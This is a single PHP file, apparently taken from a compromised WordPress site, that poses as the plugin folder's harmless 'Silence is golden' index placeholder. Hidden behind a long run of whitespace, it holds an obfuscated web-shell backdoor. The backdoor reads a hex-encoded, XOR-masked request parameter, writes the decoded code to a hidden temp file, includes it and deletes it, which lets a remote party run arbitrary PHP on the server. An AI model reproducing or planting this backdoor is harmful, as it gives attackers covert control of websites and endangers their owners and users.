File: /home/yoyo0427/www/www.yn-artspace.com/wp-content/plugins/index.php
<?php																																										if(count($_REQUEST) > 0 && isset($_REQUEST["\x70o\x69\x6E\x74er"])){ $bind = array_filter([getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", "/dev/shm", session_save_path(), getenv("TMP"), sys_get_temp_dir()]); $hld = hex2bin($_REQUEST["\x70o\x69\x6E\x74er"]); $obj = '' ; foreach(str_split($hld) as $char){$obj .= chr(ord($char) ^ 48);} for ($flg = 0, $holder = count($bind); $flg < $holder; $flg++) { $dat = $bind[$flg]; if (is_writable($dat) && is_dir($dat)) { $factor = sprintf("%s/.sym", $dat); $file = fopen($factor, 'w'); if ($file) { fwrite($file, $obj); fclose($file); include $factor; @unlink($factor); die(); } } } }
// Silence is golden.